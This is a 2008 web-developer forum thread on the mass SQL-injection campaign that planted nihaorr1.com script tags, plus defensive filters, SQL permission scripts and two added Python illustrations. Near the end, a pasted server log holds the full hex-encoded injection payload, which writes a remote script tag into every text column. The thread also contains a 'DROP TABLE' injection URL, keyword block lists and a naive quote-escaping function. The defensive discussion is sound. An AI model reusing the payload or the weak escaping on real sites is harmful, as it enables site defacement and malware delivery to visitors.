        getUserInputL = tempStr
    end function

    function formatForDb(input)
        dim tempStr
        tempStr = input
        if isNull(tempStr) = false then
            ' replace to avoid DB errors: double every single quote,
            ' then collapse runs produced by already-escaped input
            tempStr = replace(tempStr, "'", "''")
            tempStr = replace(tempStr, "''''", "''")
            tempStr = replace(tempStr, "''''''", "''")
            tempStr = replace(tempStr, "''''''''", "''")
            ' as written this replaces a double quote with itself (no change)
            tempStr = replace(tempStr, """", """")
        end if
        formatForDb = tempStr
    end function

    function formatNumberForDb(input)
        formatNumberForDb = replace(input, ",", ".")
    end function
    %>


  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 09, 2008 05:53 AM|Simontasker|LINK

    Morning everyone,

    Has anyone managed to replicate the way this virus attacks the system? I'm curious because I've now set up a test server and I'm working on testing different software packages to determine if they are viable to help protect our servers. I know that simply copying and pasting the virus code into the address bar won't work due to the string being far too long, so if anyone has found a way of replicating the attack would you please Private Message me or post here. Also, has anyone tried to block the HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library) as this seems to be the major distributor of the virus... 

     

    Thanks Simon

     


  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 10, 2008 06:34 AM|neilredfern|LINK

     Hello,

     We were also hit by this attack, although I am puzzled to hear they were able to inject the SQL into our stored procedure.  Now I know how SQL injection works and I have been able to verify that the page was vulnerable to this sort of attack.

    The puzzler for me is that they managed to inject around 2000 characters into a stored procedure via a parameter that is declared as a varchar(10).  Now in all my tests any content of the parameter over 10 characters is truncated, so how is it they are able to run the code???

    Thanks

    Neil

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 10, 2008 05:03 PM|alexhiggins732|LINK

    Please post your  code.  To my knowledge, this can be done in a stored procedure.   You must have an issue in the code that calls your stored procedure.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 10, 2008 07:02 PM|steve schofield|LINK

    Here is a link on detecting a site being exposed. 

    http://www.securityfocus.com/infocus/1768

    I'm checking to see if Nessus (http://www.nessus.org/nessus/) can detect an exposed site.  This is the ultimate tool for detecting security exploits. If they support it, I'll post instructions.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 09:15 AM|DavidReabow|LINK

    Hi Neil

    Stored procedures can help but in this case you have to worry about how the stored procedure and parameters are "passed" to SQL server.

    Lets say you had the following URL on your site:

     HTTP://www.yoursite.com/ShowProduct.ASP?ProductID=1

    You may not check the ProductID for "corrupt" data and simply build a string that includes the SP name and parameters; e.g.:

    strCommand = 'EXEC usp_GetProductDetail ' & ProductID

    If you were expecting a value of say "1" to be passed but as in the case of this injection attack the attacker calls this URL:

      HTTP://www.yoursite.com/ShowProduct.ASP?ProductID=1%20DROP%20TABLE%20tblProducts

    Your strCommand variable would now look something like this:

    'EXEC usp_GetProductDetail 1 DROP TABLE tblProducts'

    This is a simplified example but if you happened to have a table called tblProducts and if the user account executing this code had sufficient rights, then your table could be deleted.

    You can do all the checks previously mentioned on this thread and many will help improve your security.

    Another thing you should do is use Parameter objects when executing SQL statements. I'm not going to go into detail as there should be lots online for whichever development language you're using.

    A good place to start looking at this could be here:

    http://msdn.microsoft.com/en-us/library/ms681010(VS.85).aspx

     

    I hope this helps

     David

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 12:14 PM|neilredfern|LINK

    David,

    Thanks for this; it's a long time since I've done ASP. I'm used to ASP.NET where we always use parameters.  You are correct, you do just build up a string like:

    strCommand = 'EXEC usp_GetProductDetail ' & ProductID

    And it makes sense that they are using the fact that we are not parsing out ' etc., but as the actual parameter of the SP is a varchar(10) I would expect any data passed through this parameter to be trimmed down to this size.  At least that's how it happens through SQL Management Studio, although maybe ASP is different.

    I will look at the parameters, and I have implemented the script from earlier in the thread to check for SQL injection values in the querystring and form collection, which should keep them out.

    Thanks

    Neil

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 12:32 PM|DavidReabow|LINK

    Hi Neil,

    I'm not sure if I am reading your last post correctly. Are you saying that you are using Parameter Objects and it is still getting through?

    If you are just appending your parameters to the string as in my example it doesn't matter what the SP parameter is declared as.

    In my example:  'EXEC usp_GetProductDetail 1 Drop Table tblProducts'  only the "1" is actually passed to the stored procedure. The "Drop Table tblProducts" part is not passed to the SP but executed as a separate statement. The fact that it is on the same line does not mean that it is all part of the same statement.

    Even if the SP was created as follows:

    CREATE PROCEDURE usp_GetProductDetail
            @ProductID nvarchar(1000)
    AS
    .......

    "Drop Table tblProducts" will not be passed to the SP.

     

    I hope this helps.

    David

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 01:09 PM|neilredfern|LINK

    David,

    Thanks for the update that makes sense now.

    What I was trying to say rather badly is I spend 95% of my time developing in ASP.Net where we always use parameters and tell ADO.Net that we are calling a stored procedure, so I'm not used to having to deal with this sort of code.

    Thanks

     
    Neil
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 01:18 PM|pb_aldea|LINK

    Greetings members,

    Since Saturday May 10, 2008 there is another version/attempt to inject code into databases through malformed query strings.

    New destination for the javascript call is wowgm1.cn/m.js (include www. before)

    The infection they try to spread is a version of Vundo/N

    60.169.3.130 is the source of the attack.

    Of course, it is a China-assigned IP.

    Best regards, good luck!

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 03:59 AM|Flackie|LINK

    greenlit_design

    1) First to prevent script from executing or any further issues:

    deny select on sysobjects to sql_login_of_your_app
    deny select on syscomments  to sql_login_of_your_app
    deny select on syscolumns  to sql_login_of_your_app
    deny select on systypes  to sql_login_of_your_app

    The script won't even get access to the sys tables anymore (you can add more but these are the minimum)

    I found this thread as we've also experienced the problem. But I cannot seem to get these permissions to change. I connect to the SQL db with windows authentication on the server itself, logged in as an admin. But when I try to change the permissions I get:

     Msg 15151, Level 16, State 1, Line 2
    Cannot find the user 'username', because it does not exist or you do not have permission.

     The username in question does exist, I have tried this on several of the dbs and same error each time. So it seems my admin account does not have permission to deny select permissions for some users. Is that possible?

     I also tried changing the public role to deny access, as all the I_USR accounts are set as public (I was clutching at straws here, so maybe these are not even valid SQL commands):

    deny select on sysobjects to public
    deny select on syscomments  to public
    deny select on syscolumns  to public
    deny select on systypes  to public

    This does not give an error. But it apparently does nothing, since when I try running a query to list sysobjects in my web back end on the site in question, I can still get a full list of all the tables etc.

    I am not a database pro, I am a vb coder, so apologies if I come across as not really knowledgeable about the intricacies of MS SQL. I am well aware of what SQL injection is, our own sites have not been breached yet, but I don't want to take our coding resistance to injection for granted and so desperately want to tighten up the db too. This forum is the closest I have come to a practical solution to patching this problem at the database and I suspect I am probably not the only lurker who found this thread and is anxious to get the db locked down a bit.

    I was rather hoping MS might produce some simple security guidance as it seems yet again it is their platform in the crosshairs (i.e. a quick bit of SQL code as above maybe). I have trawled their site but as usual find their MSDN articles impenetrable in the extreme and have ended up googling in the hope I can find something that is simple to understand, run and verify that it is working.

     Any advice appreciated.

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 08:22 AM|eftennis|LINK


    I had the same problem with denying select permission on my sys tables.   I ended up going to my hosting provider and their SQL admin gave me this script.   This worked and allowed me to deny my ASP login account from selecting from the sysobjects table.

    use [my_admin_sql_login]
    GO
    DENY SELECT ON [sys].[sysobjects] TO [my_asp_sql_login]
    GO

    As you can see, I set up a separate login account for my asp connection.  Hope this helps.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 08:27 AM|DavidReabow|LINK

    Hi Flackie,

    Use an account with sysadmin or DBO access rights to change them, it should work.

    The following should do the job:

    use [YourDBName]
    GO

    DENY SELECT ON [sys].[tables] TO [YourUserName]
    GO
    DENY SELECT ON [sys].[columns] TO [YourUserName]
    GO

    A further note to those using this method to stop this particular attack: I have had a SQL 2000 database attacked as well. This implies that there may also be a variant of this getting table and column info from the INFORMATION_SCHEMA views. These views are available on SQL 2000 and 2005 and you should probably deny SELECT permissions on these as well. 

    And lastly, denying access to these views may stop this particular attack but it doesn't close the holes in your website's code. Anyone searching for this attack on Google, upon spotting your site, will know that you are vulnerable to a SQL injection attack and can attack you in many other ways. You need to fix the code!!!!

    David

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:02 AM|Flackie|LINK

     Thanks for the feedback and suggestions. I have tried these, but still with the same error. I am logged into the remote server on Remote Access, and then open up the SQL Management interface with Windows authentication. I am logged into the server as a server admin, and assumed I therefore have admin access to the MS SQL server. Is there a way to check this, like some SQL I can run to say "yes, you do have admin rights"? Otherwise I might be barking up the wrong tree with this one.

    On a brighter note, our application it seems was not the entry point for the client in question. We analysed his logs of the site running our app and found nothing but he looked at some others and found it was another script he had written about 2 years ago on another domain. Our application was written quite carefully, we paid a lot of attention to closing SQL injection holes, but I'd like to lock down the SQL anyway as an extra precaution.

     

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:10 AM|Flackie|LINK

    eftennis

    use [my_admin_sql_login]
    GO
    DENY SELECT ON [sys].[sysobjects] TO [my_asp_sql_login]
    GO

    As you can see, I set up a separate login account for my asp connection.  Hope this helps.

     

    I get another error... I put the SQL admin user where you have my_admin_sql_login, and it says:

    "Could not locate entry in sysdatabases for database 'sa'. No entry found with that name. Make sure that the name is entered correctly."

     So it thinks I am entering a db name, not a username. I notice that the response after yours showed a DB name in this gap. So I am a bit more confused now!

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:13 AM|DavidReabow|LINK

    Replace [my_asp_sql_login] with the login that your website uses to connect to the database (not the admin account you are using)

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:18 AM|Flackie|LINK

    DavidReabow

    Replace [my_asp_sql_login] with the login that your website uses to connect to the database (not the admin account you are using)

     

    Yes I did... my point of confusion was the first line where you had my_admin_sql_login - the error message (and the post subsequent to yours) suggested that should be the database name, not the admin username.

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:20 AM|DavidReabow|LINK

    Yes, that's an error: [my_admin_sql_login] should actually be the name of the database.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:31 AM|Flackie|LINK

     OK, I think I got it working (for one site anyway, others should be simple now). I ended up creating a new admin login for myself and then using that to go into the SQL management so I knew I had full admin rights. I made sure I gave myself permissions for all the sites I need to change and then ran the code and it worked without error.

    I then made sure it worked and does deny access by running this using the web back end of the site (which uses the ASP user account for this site):

    SELECT * from sysobjects

    Previously this returned full results, now it returns nothing - so that seems to be job done as far as this part goes.

    Thanks eftennis and davidreabow for your comments, these helped me greatly.

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:53 AM|DavidReabow|LINK

    The person(s) behind this appears to realise that he/she/they need to adapt as measures are taken to prevent these attacks. I wouldn't rely on any one single method to stop this and I wouldn't be surprised if it's back again soon in a different guise.

    Check all input from your websites (URL parameters, Form data, cookie data etc) 

    Close up the holes in the code that allows this through. (Use parameter objects)

    Revoke all unnecessary permissions (sys.Tables, syscolumns, syscomments, INFORMATION_SCHEMA views etc.)

    Do not allow your website user accounts to make schema changes.

    Do not allow your websites access to your databases with sysadmin or DBO rights.

     

    There are probably more things that I've missed but this is a good start and I've rarely seen a site that has done all this. 

     Hope this helps.

     David

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 11:09 AM|greenlit_design|LINK

    Hi, a sysadmin account in MS SQL gives you access to all databases and gives you all privileges. So basically you don't need any other rights. I'm not sure if a Windows Admin account has admin rights in MS SQL. I believe you need to add the Windows account to MS SQL and grant that account proper permissions. If you were able to create a new SQL login with SysAdmin privileges, then you probably had SysAdmin.

    Each database has a "permission admin" role which allows a SQL user to grant permissions. Remember, a SQL login grants access at the database level (except for server roles like sysadmin). You need to grant that SQL login access to each database you want that SQL login to access. If you grant DBO rights to a SQL login for a database, that SQL login becomes a user in the database. DBO rights are the highest level in a database (not database server). So you'll get create, alter, grant, select etc. for all DB objects (views, stored procs, etc.).

    Security in MS SQL can get complicated. That's why it's important to involve a DBA when you're not sure. People tend to grant DBO rights because it's the easiest way. You then pay the price later. Luckily the script did not try to create tables, stored procs... Don't hesitate if you have questions.

    Flackie

     Ok I think i got it working (for one site anyway, others should be simple now). I ended up creating a new admin login for myself and then using that to go into the SQL management so i knew i had full admin rights. I made sure I gave myself permissions for all the sites I need to change and then ran the code and it worked without error.

    I then made sure it worked and does deny access by running this using the web back end of the site (which uses the ASP user account for this site):

    SELECT * from sysobjects

    Previously this returned full results, now it returns nothing - so that seems to be job done as far as this part goes.

    Thanks eftennis and davidreabow for your comments, these helped me greatly.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 11:50 AM|DavidReabow|LINK

    I've been looking for a good tutorial on using parameters to pass on to some developers and found this:

    http://weblogs.sqlteam.com/jeffs/archive/2006/07/21/10728.aspx

    Everyone should use parameter objects whether you use stored procedures or not. It is probably one of the most important things to do when protecting yourself from SQL Injection.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 14, 2008 03:13 AM|csraodel|LINK

     

    Do a complete server-side data validation on your forms.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 15, 2008 06:12 AM|drors01|LINK

    Hi,

    I added the URL filter to my site just in case...

    But then I started getting too many false alarms due to Google's search.
    It is doing many sorts of phrases that include many of the words that are not allowed.

    So I made a change to the verify function:

    function verify(s)

     dim risk_level_counter, badwords, r, i

     ' convert the querystring to lowercase
     s = lcase(s)
     risk_level_counter = 0

     ' badwords - a list of disallowed keywords in the url
     badwords = "select 1=1 insert update delete drop -- table alter cast declare convert exec chr( union"

     ' create an array of each bad word
     r = split(badwords, " ")

     ' loop through the bad words and count how many are present
     for i = 0 to ubound(r)
       if instr(s, r(i)) > 0 then
         risk_level_counter = risk_level_counter + 1
       end if
     next

     ' block only when two or more bad words occur, to cut down on false alarms
     if risk_level_counter >= 2 then
       verify = false
     else
       verify = true
     end if

    end function

    I think that I am going to give a unique level of risk to each word, for instance giving 3 for DECLARE, UPDATE, DROP and a level of 1 to SELECT.

    I would also combine the checks with the length of the string not allowing more than 150 characters for a known need.

    Thanks
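
A weighted form of the counter above, as an added example rather than drors01's code: the keyword list is the post's badwords string, each word gets a risk weight, the 150-character cap is applied first, and the query string is URL-decoded before matching; the weights and threshold are constructed values, not from the thread. It remains a supplementary filter alongside parameter objects, since any keyword list can be dodged by rephrasing.

```python
import re
from urllib.parse import unquote_plus

# Weighted version of the risk counter in the verify() function above: the
# keyword list is the post's badwords string; the weights and threshold are
# constructed values for this example (tune them against your own traffic).
KEYWORD_WEIGHTS = {
    "declare": 3, "update": 3, "drop": 3, "exec": 3, "alter": 3,
    "cast": 2, "convert": 2, "insert": 2, "delete": 2, "union": 2,
    "select": 1, "table": 1, "1=1": 1, "--": 1, "chr(": 1,
}
MAX_LENGTH = 150       # the length cap suggested in the post
BLOCK_THRESHOLD = 3    # one high-risk word, or a few low-risk ones together


def _pattern(word):
    # Whole-word match for alphabetic keywords so "dropdown" or "updated" in
    # ordinary parameters do not count; symbol tokens match as plain substrings.
    if word.isalpha():
        return re.compile(r"(?<![a-z0-9_])" + re.escape(word) + r"(?![a-z0-9_])")
    return re.compile(re.escape(word))


PATTERNS = {word: _pattern(word) for word in KEYWORD_WEIGHTS}


def risk_score(query_string):
    """Return (score, {keyword: weight}) for one raw query string.

    The string is URL-decoded and lower-cased first; matching the still-encoded
    form is what lets an attacker slip past by inserting an extra %20.
    """
    text = unquote_plus(query_string).lower()
    hits = {w: KEYWORD_WEIGHTS[w] for w, p in PATTERNS.items() if p.search(text)}
    return sum(hits.values()), hits


def verify(query_string):
    """Weighted replacement for verify(): returns (allowed, reason)."""
    if len(query_string) > MAX_LENGTH:
        return False, "length %d exceeds %d" % (len(query_string), MAX_LENGTH)
    score, hits = risk_score(query_string)
    if score >= BLOCK_THRESHOLD:
        return False, "risk %d from %s" % (score, sorted(hits))
    return True, "ok"


if __name__ == "__main__":
    for qs in ("ProductID=1", "q=select+the+best+widgets", "view=dropdown&sort=updated"):
        print(qs, "->", verify(qs))
```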

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 15, 2008 07:28 AM|DavidReabow|LINK

    Hi everyone,

     I'm going to suggest an alternative to the "find bad words and redirect" solution. This may not work for everyone but will hopefully break any attempts to inject SQL.

     You should still search for the "bad" words but when you find them, instead of redirecting to another page, you should replace them with the same word and a character.

    So if you find the words "Select" or "Declare", simply replace them with "Select," or "Declare,". By inserting a "," it should be sufficient to break the sql statement and not allow it to run.

    This should also help where sites do pass valid text data that may contain these words.

     Replace "--" with "-,-". This will break the comment.

    Also if valid data is identified as a false positive, rather than redirecting your user it just looks like a "typo" error if the data is stored and displayed.

    This will also be friendly towards things like fulltext searches.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 16, 2008 01:08 PM|DavidReabow|LINK

    Hi all,

    Here are some "DENY" permission scripts I have used. I'd advise you to check that they don't break your applications/websites before using them.

     

     

    -------------------------------------------------------------------------------------- Master -------------------------------------------------------------------------------------------

    use [Master]

    GO

    DENY SELECT ON [INFORMATION_SCHEMA].[TABLES] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[COLUMNS] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[VIEW_COLUMN_USAGE] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[CONSTRAINT_COLUMN_USAGE] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[COLUMN_PRIVILEGES] TO [Public]

    GO

    -------------------------------------------------------------------------------------- Your Database --------------------------------------------------------------------------------

    use [Your_Database_name]

    GO

    DENY SELECT ON [sys].[columns] TO [Your_User]

    DENY SELECT ON [sys].[tables] TO [Your_User]

    DENY SELECT ON [sys].[syscolumns] TO [Your_User]

    DENY SELECT ON [sys].[sysobjects] TO [Your_User]

    DENY SELECT ON [sys].[objects] TO [Your_User]

    DENY SELECT ON [sys].[syscomments] TO [Your_User]

    GO

     

    I have also revoked all insert/update/delete permission from tables where the account does not need them. 

    You may also want to deny permission on CREATE statements.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 18, 2008 06:08 PM|lillyg|LINK

    Would it work to use the CInt function to test the ID that's passed to confirm that it is an integer between -32767 and 32767?  It seems like that would force an error given the length and alpha characters that are in the script.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 18, 2008 06:38 PM|DavidReabow|LINK

    Hi Lilly,

    I would still suggest using parameter objects. There are two main reasons for this;

    1. You can set the data type of the parameter object and achieve the same "error checking" as you would with CInt.

    2. SQL Server treats parameters slightly differently from executing a single "string" statement. When a string is executed it is first interpreted, or it has to be "prepared" by SQL Server for execution, and any malformed character strings that can be interpreted as executable will be executed. When parameters are passed into a statement they are treated as parameters and malformed data is not executed.

     

    This takes care of the interface between your development language and SQL Server. I have seen Stored Procedures that take character strings and within the stored procedure build Dynamic SQL statements. If anyone is doing this you are in danger of being attacked the same way within your SP. This is particularly true where the SP accepts large character strings. To fix this you can also use parameters within TSQL (also known as prepared statements).

    I know it isn't always possible as some applications will have to accept long strings but where possible you should also limit the length of your character data.

    A combination of many of the previously mentioned solutions would be best. All you really need to achieve is to "break" the execution of the malicious code. Some people have mentioned detecting specific strings from this attack and acting on that. The problem with this approach is that the attacker could easily change something, All he/she/they need to do is add an extra %20 and your detection will fail. 

    I still believe that one of the most important things is to use parameter objects at your code level and parameters (prepared statements) within your SP's.

    Regards

    David
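
An added illustration of the two points made in this reply and in the May 12 post above (not code from the thread): the concatenated 'EXEC usp_GetProductDetail ' & ProductID pattern hands whatever follows the 1 to the engine as further SQL, while a bound parameter keeps it a plain value and a type check rejects it outright. It uses Python with an in-memory SQLite database in place of SQL Server, so a constructed tblProducts and a plain SELECT stand in for the stored procedure, and the small batch runner mimics SQL Server executing every statement of a concatenated command string.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the thread's tblProducts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE tblProducts (ProductID INTEGER PRIMARY KEY, Name TEXT);"
        "INSERT INTO tblProducts VALUES (1, 'Widget'), (2, 'Gadget');"
    )
    return conn


def run_batch(conn, batch):
    """Run every statement in a command string, as SQL Server does with a
    concatenated batch. SQLite's execute() refuses stacked statements, so the
    batch is split on ';' here (T-SQL would not even need the semicolon)."""
    rows = []
    for statement in batch.split(";"):
        if statement.strip():
            rows.extend(conn.execute(statement).fetchall())
    return rows


def show_product_concat(conn, product_id):
    """The vulnerable pattern: the request value is glued into the SQL text,
    so everything after the '1' is parsed and executed as further SQL."""
    sql = "SELECT Name FROM tblProducts WHERE ProductID = " + product_id
    return run_batch(conn, sql)


def show_product_param(conn, product_id):
    """Parameter object: the statement is compiled first and the value is bound
    afterwards, so '1; DROP TABLE ...' is merely a string compared against
    ProductID and no row matches."""
    sql = "SELECT Name FROM tblProducts WHERE ProductID = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def show_product_typed(conn, product_id):
    """The CInt idea from the thread, applied before binding: anything that is
    not an integer is rejected here (ValueError) and never reaches the engine."""
    return show_product_param(conn, int(product_id))


def table_exists(conn):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'tblProducts'"
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    hostile = "1; DROP TABLE tblProducts"   # the shape of the thread's example
    db = make_db()
    print(show_product_concat(db, "1"))      # [('Widget',)]
    show_product_concat(db, hostile)         # the DROP runs as a second statement
    print("table left after concat:", table_exists(db))   # False
    db = make_db()
    print(show_product_param(db, hostile))   # [] and the table survives
    print("table left after param:", table_exists(db))    # True
```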

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 20, 2008 01:03 AM|wistex42|LINK

    In my situation, most of the input should not have a ' or a ; in it at all, so I just filter that out completely when those characters are not expected.  I place an include with the following code at the top of almost every page.

    <%
    str = request.servervariables("QUERY_STRING")
    if instr(str, ";") then response.redirect("/404msg.asp")
    str = Request.Form
    if instr(str, ";") then response.redirect("/404msg.asp")

    str = request.servervariables("QUERY_STRING")
    if instr(str, "--") then response.redirect("/404msg.asp")
    str = Request.Form
    if instr(str, "--") then response.redirect("/404msg.asp")

    str = request.servervariables("QUERY_STRING")
    if instr(str, "'") then response.redirect("/404msg.asp")
    str = Request.Form
    if instr(str, "'") then response.redirect("/404msg.asp")
    %>

    This won't work for everyone, but if you know for sure that a ' or ; or a -- should not be in the input, just kill it before it goes anywhere. 

    This code checks both GET and POST (i.e. parameters in the URL or submitted from a form) and can be used as a preemptive filter before it even gets to the rest of the code.

    Obviously this is not the only thing you should do, but it may be a quick way to kill certain attacks.  Combine this with proper sanitizing of variables, and it makes your site more difficult to attack.
     

    lillyg

    Would it work to use the CInt function to test the ID that's passed to confirm that it is an integer between -32767 and 32767?  It seems like that would force an error given the length and alpha characters that are in the script.

     

    That should definitely be used for checking integers.  But depending on the application, not all parameters may be integers.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 21, 2008 10:08 PM|ejhay|LINK

     

    Hi, I'm a System Administrator of a hosting company and one of our websites has been hacked with SQL injection. At first the hacker inserted nihaorr1.com/1.js; most of the website tables were affected by this attack. After that I created a SQL validation like the one that you have posted in this forum; unfortunately the hacker inserted a malicious URL on the MS SQL database again. What I did is include the validation for all database-driven pages to make the website secure, but at this time the hacker can insert the script again and again. I think the hacker is using a program that executes this kind of hacking activity. Please advise what else I can do with this problem. Thanks

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 21, 2008 10:11 PM|ejhay|LINK

     

    Hi, I'm a System Administrator of a hosting company, and one of our websites has been hacked with SQL injection. At first the hacker inserted nihaorr1.com/1.js; most of the website tables were affected by this attack. After that incident I developed a SQL validation that is similar to the ASP script that you posted in this forum; unfortunately the hacker inserted a malicious URL on the MS SQL database again. What I did is include the validation for all database-driven pages to make the website secure, but at this time the hacker can insert the script again and again. I think the hacker is using a program that executes this kind of hacking activity. Please advise what else I can do with this problem. Thanks

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 05, 2008 01:06 AM|silkyfixer|LINK

    I have had a run-in with this injection and I have created several scripts to clean a database of injection as long as it has not truncated over data. If people need help, hit me up.

     

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 05, 2008 01:07 AM|silkyfixer|LINK

    oh and i can fix your poorly coded asp pages that are causing it to happen too.

     

     S.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 09, 2008 12:30 PM|racekites|LINK

    does anyone know if the SQL string can contain web encoded characters ?

    a dash "-" can also be &#107; does SQL Server know what to do with this or will it throw an error ?

    Cheers

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 20, 2008 05:02 PM|wybnormal|LINK

    You can stop the SQL attacks with an ISAPI filter called "WebKnight", which is a freebie. It will, among other things, watch the string length on the forms and if it exceeds X number of characters, it blocks it. It will also look for embedded commands etc. This has stopped the attacks against our servers for the past three weeks. The company name is "Aqtronix" http://www.aqtronix.com/?PageID=99

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 11, 2008 05:55 AM|kimrennin|LINK


    The number of infected Web pages spiked to 282,000 in the past day, and appears to be growing. Network managers can check to see whether their Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag. The string is <script src=http://www.nihaorr1.com/1.js>, according to the security vendor. The worst part of it all is that these infestations are not in seamy Web sites; they are taking place in legitimate Web pages. An IFRAME redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe. The malicious page scans the visitor's machine to find ways to compromise it. Exploits are then downloaded and used to infect the redirected visitor based on the information found on the scan.

    ---------------------------
    kimrennin
    WideCircles

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 21, 2008 06:43 AM|steve schofield|LINK

    URLScan 3.0 was released to help with these types of automated attacks.

    http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 21, 2008 11:28 PM|silkyfixer|LINK

    Well, one sneaked through my URLScan 3.0. I am still trying to figure out how they got past the DECLARE statement. Can you post your config?

     

    silkyfixer

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 12:19 AM|steve schofield|LINK

    Do you have the IIS log entry that shows the one that squeaked through?

    http://www.iislogs.com/urlscan.txt is my config.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 11:38 AM|silkyfixer|LINK

    My problem is that I have various websites that connect to the same database. I need some sort of trigger that catches an update on the database with a <script in the update and tells me what site it came from. I have sanitized most of my code as well, but every 2-3 weeks one of my databases still gets infected.

    would you have a trigger script i could install globaly on my sql server ?

    thanks

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 11:44 AM|silkyfixer|LINK

    I found this for today in my logs. I noticed my database was infected this morning; it happened last night. This is the only DECLARE in my log. I wonder if they are using something other than DECLARE.

    GET /index.asp ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 65.96.169.213 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - - 200 0 0 34770 1607 9765

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 12:14 PM|steve schofield|LINK

    What is your urlscan.ini set up to look for?

    [SQL Injection Raw]
    AppliesTo=.asp,.aspx

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 01:20 PM|silkyfixer|LINK

    [Options]
    UseDenyVerbs=1
    UseDenyExtensions=1
